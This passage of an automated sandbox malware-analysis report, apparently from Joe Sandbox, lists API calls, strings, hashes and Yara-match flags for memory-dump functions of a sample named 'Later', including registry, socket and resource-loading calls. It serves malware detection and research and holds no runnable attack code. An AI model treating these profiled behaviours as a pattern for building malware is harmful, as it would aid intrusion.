                                        • _wprintf.LIBCMT ref: 00C546B9
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C546D7
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 00C546B4
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message_wprintf
                                        • String ID: %s (%d) : ==> %s: %s %s
                                        • API String ID: 3648134473-3128320259
                                        • Opcode ID: da0f75aead4e41d3f6b372a7808304c152d293f34ce86e329765fe9998707209
                                        • Instruction ID: cb65c68267b746e28a0d3347a896d86f0e6ec31e076c6df083f5f6e01409c315
                                        • Opcode Fuzzy Hash: da0f75aead4e41d3f6b372a7808304c152d293f34ce86e329765fe9998707209
                                        • Instruction Fuzzy Hash: 6D0162F69402087FE751A7909D89FFA776CEB08305F1005A5BB45E2041EA745E888B79
                                        APIs
                                          • Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77
                                          • Part of subcall function 00C71242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C701D5,?,?), ref: 00C71259
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C70216
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                        • String ID:
                                        • API String ID: 3479070676-0
                                        • Opcode ID: 71f9169cc70db3546eb49f9ad0ba106d866e34ec81829bebe6950849adfdcd87
                                        • Instruction ID: 65fefaf76673a7324e8663a70b0d3b2ab59028ea923316ef01c3e3eee4ab44c5
                                        • Opcode Fuzzy Hash: 71f9169cc70db3546eb49f9ad0ba106d866e34ec81829bebe6950849adfdcd87
                                        • Instruction Fuzzy Hash: 46A19C31204205DFDB10EF54C885B6EB7E5BF84314F24891DFAAA9B2A2DB31ED45DB42
                                        APIs
                                          • Part of subcall function 014D886F: EnterCriticalSection.KERNEL32(0152B5F4,?,03FFFFFF,?,01425448,00000000,?,03FFFFFF,?,940E2C7A,?,?,?), ref: 014D887A
                                          • Part of subcall function 014D886F: LeaveCriticalSection.KERNEL32(0152B5F4,?,01425448,00000000,?,03FFFFFF,?,940E2C7A,?,?,?), ref: 014D88A6
                                        • FindResourceExW.KERNEL32(00000000,00000006,00000001,00000000,00000000,?,03FFFFFF,?,940E2C7A), ref: 01425476
                                        • LoadResource.KERNEL32(00000000,00000000,?,940E2C7A), ref: 01425484
                                        • LockResource.KERNEL32(00000000,?,940E2C7A), ref: 0142548F
                                        • SizeofResource.KERNEL32(00000000,00000000,?,940E2C7A), ref: 0142549D
                                        • FindResourceW.KERNEL32(00000000,?,00000006,?,940E2C7A), ref: 01425500
                                        • LoadResource.KERNEL32(00000000,00000000,?,940E2C7A), ref: 01425513
                                        • LockResource.KERNEL32(00000000,?,940E2C7A), ref: 01425522
                                        • SizeofResource.KERNEL32(00000000,00000001,?,940E2C7A), ref: 01425536
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Resource$CriticalFindLoadLockSectionSizeof$EnterLeave
                                        • String ID:
                                        • API String ID: 506522749-0
                                        • Opcode ID: 16a991bbf2a925c34e5ef84979cf382fbd2b39566d8e577101056e6a3666d804
                                        • Instruction ID: 26e0391d4bf4b254deba0e30ebd1ec88893209da58e55d3a6c3c7a8abd58d82d
                                        • Opcode Fuzzy Hash: 16a991bbf2a925c34e5ef84979cf382fbd2b39566d8e577101056e6a3666d804
                                        • Instruction Fuzzy Hash: 11410332A012259BDB329F68C884ABFB7F9FF40701B45052EED55DF364EA30D9818650
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 00C765D8
                                        • GetDC.USER32(00000000), ref: 00C765E0
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C765EB
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00C765F7
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C76633
                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C76644
                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C79417,?,?,000000FF,00000000,?,000000FF,?), ref: 00C7667E
                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C7669E
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                        • String ID:
                                        • API String ID: 3864802216-0
                                        • Opcode ID: 22195866dc0da927da7c914c9ba605c62a8cff18b73191fcab2f4b2425114cef
                                        • Instruction ID: 265c47cc83fa54e972f38e15887c7f9095c5dc7cd297a58d67f2b9a94d6bed91
                                        • Opcode Fuzzy Hash: 22195866dc0da927da7c914c9ba605c62a8cff18b73191fcab2f4b2425114cef
                                        • Instruction Fuzzy Hash: 07317872201614AFEB518F10CC8AFEA3BA9EF49761F044055FE08AA291D6759855CBA8
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: 446f4535e3700edf46536333a8210beabe70d3f12c6da612eab272c8174c15fd
                                        • Instruction ID: d66b6df78b876a9202d84536bd121e0492e8e3ad2885f2af1d8efc91a2141762
                                        • Opcode Fuzzy Hash: 446f4535e3700edf46536333a8210beabe70d3f12c6da612eab272c8174c15fd
                                        • Instruction Fuzzy Hash: BE21F2A1A072057B924076158DC2FFF771DBE41B88B044026FE06A6252EB54FF11B2A9
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _strrchr
                                        • String ID:
                                        • API String ID: 3213747228-0
                                        • Opcode ID: a971cdcd53c9ee205c9c0adb9481af7acba1b2869514519882e4917ea65f7e54
                                        • Instruction ID: 4f87e621f2db673e25a7148ba05ce17e6c5985e8d659fb59d8cdd8f98c59265c
                                        • Opcode Fuzzy Hash: a971cdcd53c9ee205c9c0adb9481af7acba1b2869514519882e4917ea65f7e54
                                        • Instruction Fuzzy Hash: 4CB13872D002569FDB128FA8CC84BAF7FE5EF65311F14416BE908AB392D3749901CBA0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeGetcvtRegister
                                        • String ID:
                                        • API String ID: 2755674607-0
                                        • Opcode ID: c0151cf32faa9e0299b470157a52e9c3c0a4e0a0d31e4530d4a478e918108480
                                        • Instruction ID: dbf32b7a5408712e2638f7829ba7892fd93e23f9889bc43f5edc5225f4b797ad
                                        • Opcode Fuzzy Hash: c0151cf32faa9e0299b470157a52e9c3c0a4e0a0d31e4530d4a478e918108480
                                        • Instruction Fuzzy Hash: 1751DF79D00709CFDB25DF58C540AAAB7B4FF24B10F15826EE845AB361EB30BA45CB91
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 014DC237
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 014DC23F
                                        • _ValidateLocalCookies.LIBCMT ref: 014DC2C8
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 014DC2F3
                                        • _ValidateLocalCookies.LIBCMT ref: 014DC348
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: b7285282acb27028f99682685a06eda0b4618241178b2c890018230f34236594
                                        • Instruction ID: 1729c9e57a15495f4e630c7702c173cf67a0292a6f0213e68e99ef537c9d983d
                                        • Opcode Fuzzy Hash: b7285282acb27028f99682685a06eda0b4618241178b2c890018230f34236594
                                        • Instruction Fuzzy Hash: E441A334E002199FCF10DFA9C894A9EBBF5BF59314F14805EE9189B3A5D731AA05CB90
                                        APIs
                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00C766D9
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C7670C
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C76741
                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00C76773
                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00C7679D
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C767AE
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C767C8
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: LongWindow$MessageSend
                                        • String ID:
                                        • API String ID: 2178440468-0
                                        • Opcode ID: a3b489b4d348f9a9d29961aba2a8c9494d9f79e1b7ebc7950862c6ee82864489
                                        • Instruction ID: 58ec72d69dab15a105ebddea2cbdb9902c6bbdf8e09f7310e00d8499ae37dc99
                                        • Opcode Fuzzy Hash: a3b489b4d348f9a9d29961aba2a8c9494d9f79e1b7ebc7950862c6ee82864489
                                        • Instruction Fuzzy Hash: 7B3158352005109FDB24CF18DC84F593BE5FB89798F2981A4FA288F2B2CB72AD54DB50
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4E0AD
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4E0D3
                                        • #2.WSOCK32(00000000), ref: 00C4E0D6
                                        • #2.WSOCK32(?), ref: 00C4E0F4
                                        • #6.OLEAUT32(?), ref: 00C4E0FD
                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00C4E122
                                        • #2.WSOCK32(?), ref: 00C4E130
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$FromString
                                        • String ID:
                                        • API String ID: 1211328463-0
                                        • Opcode ID: 2b192be69a99c517eb5d098ae4f47b5d97c64216d3741a6f03e6bc712fca9792
                                        • Instruction ID: 393efb693f2d23b383b838b243263fd50635d1ab8e0957e8b743ec3955adbab1
                                        • Opcode Fuzzy Hash: 2b192be69a99c517eb5d098ae4f47b5d97c64216d3741a6f03e6bc712fca9792
                                        • Instruction Fuzzy Hash: 5421B232600219AFAB50DFA8CC88EBF73ACFF09360F158125FA15DB291D6709D859B64
                                        APIs
                                          • Part of subcall function 00C6823D: #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C68268
                                        • #23.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C66676
                                        • #111.WSOCK32(00000000), ref: 00C66685
                                        • #12.WSOCK32(00000000,8004667E,00000000), ref: 00C666BE
                                        • #4.WSOCK32(00000000,?,00000010), ref: 00C666C7
                                        • #111.WSOCK32 ref: 00C666D1
                                        • #3.WSOCK32(00000000), ref: 00C666FA
                                        • #12.WSOCK32(00000000,8004667E,00000000), ref: 00C66713
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: #111
                                        • String ID:
                                        • API String ID: 568940515-0
                                        • Opcode ID: 46a221bcf9a34776a8d1b726a027321ce960e7e23fbe156c681a9a5650b6b98b
                                        • Instruction ID: 7aa311e6bfc3eb4b3c0197c1fe519b2af3bbf196336c4ba03a3cc0e025c41e62
                                        • Opcode Fuzzy Hash: 46a221bcf9a34776a8d1b726a027321ce960e7e23fbe156c681a9a5650b6b98b
                                        • Instruction Fuzzy Hash: A131D471600208AFDB209F64DCC5BBE77EDEB44764F104169FE15972D1DB70AD488BA1
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4E188
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4E1AE
                                        • #2.WSOCK32(00000000), ref: 00C4E1B1
                                        • #2.WSOCK32 ref: 00C4E1D2
                                        • #6.OLEAUT32 ref: 00C4E1DB
                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00C4E1F5
                                        • #2.WSOCK32(?), ref: 00C4E203
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$FromString
                                        • String ID:
                                        • API String ID: 1211328463-0
                                        • Opcode ID: 8722b33bfa3d33bae4bcb8b9f2685df0e294ed4457f93cf168c24a1964ed5fac
                                        • Instruction ID: 5ee362cf0cccf26eba38b05c319d6efde04085497fe180213b499b6e3d80f628
                                        • Opcode Fuzzy Hash: 8722b33bfa3d33bae4bcb8b9f2685df0e294ed4457f93cf168c24a1964ed5fac
                                        • Instruction Fuzzy Hash: F521A731644108AFDB609FA8DC88EBE77ECFF49360B118125FA15CB2A1D670DD819B64
                                        APIs
                                        • FreeLibrary.KERNEL32(00000000,?,014EC558,01401AF7,?,00000000,?,?,?,014EC7C2,00000022,FlsSetValue,0150A0E4,0150A0EC,?), ref: 014EC50A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID: api-ms-$ext-ms-
                                        • API String ID: 3664257935-537541572
                                        • Opcode ID: 5ba0c7192fc642904a2bdb8bd5f925094b85f25b92d90dcfb6828859641ebbb2
                                        • Instruction ID: fe206b66b65ddbbd2e07290bcd1563cbbb45abf32fc360a11e6676e35ec574eb
                                        • Opcode Fuzzy Hash: 5ba0c7192fc642904a2bdb8bd5f925094b85f25b92d90dcfb6828859641ebbb2
                                        • Instruction Fuzzy Hash: 9E213D32A00255ABDB339F69DC8CA7B37E8EB41775F150126E926AB395E730E904C7D0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Mpunct$GetcvtGetvalsH_prolog3
                                        • String ID: $+xv
                                        • API String ID: 2737107202-1686923651
                                        • Opcode ID: 47bd2a7c025d3b42a41016004653e82da80b11f6617e633a1f0565bbb0c83614
                                        • Instruction ID: 9e71abf4a6d246f190594c00d80e6f3caf01bb52864c8bb834cdfa822b4793a9
                                        • Opcode Fuzzy Hash: 47bd2a7c025d3b42a41016004653e82da80b11f6617e633a1f0565bbb0c83614
                                        • Instruction Fuzzy Hash: E021B0B5904B42AEDB61DF75889063BBEF8AB28601F04091FE599C7A51D734E602CB90
                                        APIs
                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00C141B2,?), ref: 00C14103
                                        • GetProcAddress.KERNEL32(00000000), ref: 00C1410A
                                        • EncodePointer.KERNEL32(00000000), ref: 00C14116
                                        • DecodePointer.KERNEL32(00000001,00C141B2,?), ref: 00C14133
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                        • String ID: RoInitialize$combase.dll
                                        • API String ID: 3489934621-340411864
                                        • Opcode ID: a3210ae7c0429deb5dca95c7474c5c974be9fc9179ec53e4e1deb694822dd99b
                                        • Instruction ID: 11d6add9973a2834d7aae1456dc4ee183749f24522be10e5bb64daff504002c6
                                        • Opcode Fuzzy Hash: a3210ae7c0429deb5dca95c7474c5c974be9fc9179ec53e4e1deb694822dd99b
                                        • Instruction Fuzzy Hash: A2E01AB1A90350AFDF942FB8EC4DB4C3664BB26F06F604524F421D50B0DBB545D89F08
                                        APIs
                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C140D8), ref: 00C141D8
                                        • GetProcAddress.KERNEL32(00000000), ref: 00C141DF
                                        • EncodePointer.KERNEL32(00000000), ref: 00C141EA
                                        • DecodePointer.KERNEL32(00C140D8), ref: 00C14205
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                        • String ID: RoUninitialize$combase.dll
                                        • API String ID: 3489934621-2819208100
                                        • Opcode ID: 6e39737b74fa9633de4bd25d36034d0f8fb01a5f5cc09caff2e914142ac9a157
                                        • Instruction ID: f83397b1104ce7ff0a59dd72357c782654e6a0c5f8b8a7aec7d3c8324db64011
                                        • Opcode Fuzzy Hash: 6e39737b74fa9633de4bd25d36034d0f8fb01a5f5cc09caff2e914142ac9a157
                                        • Instruction Fuzzy Hash: 95E0EC79995310AFDB989F64FD0DF4C3AA8BB21B06F204229F011E21B1CBB446C8DB18
                                        APIs
                                          • Part of subcall function 014E51E4: CloseHandle.KERNEL32(?,?,?,014E531B,?,?,0143D6A9,00000000), ref: 014E5215
                                          • Part of subcall function 014E51E4: FreeLibraryAndExitThread.KERNEL32(?,?,?,?,014E531B,?,?,0143D6A9,00000000), ref: 014E522B
                                          • Part of subcall function 014E51E4: ExitThread.KERNEL32 ref: 014E5234
                                        • __allrem.LIBCMT ref: 014E54A4
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E54C0
                                        • __allrem.LIBCMT ref: 014E54D7
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E54F5
                                        • __allrem.LIBCMT ref: 014E550C
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E552A
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$ExitThread$CloseFreeHandleLibrary
                                        • String ID:
                                        • API String ID: 1885649644-0
                                        • Opcode ID: 6fea525441ed0e021e1b8f95325e267f9a1fa0c9dde304b0edb62d3332323cc5
                                        • Instruction ID: f035e8e721dd080a6ecc91f22abd9958b31cd110d9d68b4f470ec7025546fcca
                                        • Opcode Fuzzy Hash: 6fea525441ed0e021e1b8f95325e267f9a1fa0c9dde304b0edb62d3332323cc5
                                        • Instruction Fuzzy Hash: B68104B5A00706AFE7249E2ECC48B6B77E9AF6422AF14452FE111DF7A0EBB0D5018750
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00BF21B8
                                        • GetWindowRect.USER32(?,?), ref: 00BF21F9
                                        • ScreenToClient.USER32(?,?), ref: 00BF2221
                                        • GetClientRect.USER32(?,?), ref: 00BF2350
                                        • GetWindowRect.USER32(?,?), ref: 00BF2369
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Rect$Client$Window$Screen
                                        • String ID:
                                        • API String ID: 1296646539-0
                                        • Opcode ID: 7e5b113a054ec048522f1b609beca7e37e704bf85443bf7f3acf540a8d4b0968
                                        • Instruction ID: 695c1d6c42d2f1d42a01e572d61af42df8f9fd488cb4c21a569154bad8359d3d
